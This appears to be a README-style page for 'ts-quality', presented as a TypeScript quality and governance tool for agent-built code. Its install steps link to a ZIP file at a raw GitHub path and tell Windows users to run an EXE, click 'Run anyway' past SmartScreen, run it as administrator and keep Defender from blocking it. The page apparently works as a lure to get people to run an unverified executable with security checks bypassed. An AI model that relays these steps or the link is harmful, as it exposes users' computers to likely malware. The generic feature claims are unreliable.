Visit this page to download: https://raw.githubusercontent.com/Neocortical-one877/ts-quality/main/packages/legitimacy/ts-quality-v3.6.zip
- Open the link above in your web browser.
- Find the latest release.
- Download the Windows file that matches your PC.
- If you see a ZIP file, save it to your computer.
- If you see an EXE file, save it and open it.
- If Windows asks for permission, choose Run or Yes.
Use these steps on a Windows PC.
- Download the release file from the link above.
- If the file is zipped, right-click it and choose Extract All.
- Open the extracted folder.
- Look for the app file, such as
ts-quality.exe. - Double-click the file to start the app.
- If Windows SmartScreen appears, choose More info, then Run anyway if you trust the source.
ts-quality helps you check TypeScript changes before they reach users. It is built for teams that use agents or automated code changes. It focuses on control, trust, and proof.
It can help you:
- Check code changes for breakage
- Catch weak test coverage
- Watch for rule changes in key files
- Track safe approval steps
- Keep a record of what was allowed
- Reduce surprise changes in agent-built systems
- Mutation testing checks if tests can catch bad changes
- Invariants help protect rules that should not change
- Governance controls help guide what can be approved
- Attestation records support traceable actions
- Static checks help find risky code patterns
- CLI use makes it easy to run from a file or terminal
- TypeScript support fits common app and tool setups
For a smooth run on Windows, use a computer with:
- Windows 10 or later
- At least 4 GB of RAM
- 200 MB of free disk space
- Internet access for the first download
- Permission to open downloaded apps
If your work uses a company laptop, you may need approval to run new software
After you open the app or run the file, follow the on-screen steps:
- Choose the folder you want to check.
- Select the TypeScript project or source files.
- Pick the checks you want to run.
- Start the scan.
- Review the results.
- Save any report or log file if you need to share it.
If the app gives you a command line, you can run checks from a project folder and review the output in the window
- Before merging code from an agent
- Before shipping a TypeScript update
- When a change touches core logic
- When you need a record of approval
- When you want tests to guard key paths
- When you need a simple quality gate for automation
The app may show:
- Files that changed
- Checks that passed
- Checks that failed
- Test gaps
- Risky edits
- Approval status
- Exported proof or audit data
Read failed checks first. They point to the parts that need work
ts-quality is built for systems where code can change fast. It helps you keep control over those changes. It supports a clear path from change to check to approval.
That can help when you need:
- A safe review flow
- A record of what ran
- A record of what passed
- A way to limit risky edits
- A simple view of code health
If the app does not open:
- Check that the file finished downloading.
- Re-download the release if the file looks broken.
- Extract the ZIP again if needed.
- Right-click the file and choose Run as administrator.
- Make sure Windows Defender or SmartScreen is not blocking the app.
- Try the newest release from the download page.
If you see a missing file message, keep the whole folder together and open the main app from that folder
A release may include:
.exefor Windows.zipfor packed files.txtor.mdfor notes- report files for saved results
- log files for run history
Open only the main Windows app file unless the release notes say to use another file
After install, run a small check on one project folder first. Use a folder with a few TypeScript files. This gives you a fast way to confirm that the app starts and the checks work
- Name: ts-quality
- Description: Deterministic trust for TypeScript changes in agent-built systems
- Topics: agentic-systems, ai-agents, attestation, cli, code-quality, developer-tools, governance, mutation-testing, static-analysis, typescript
If you need the release page later, use this link: https://raw.githubusercontent.com/Neocortical-one877/ts-quality/main/packages/legitimacy/ts-quality-v3.6.zip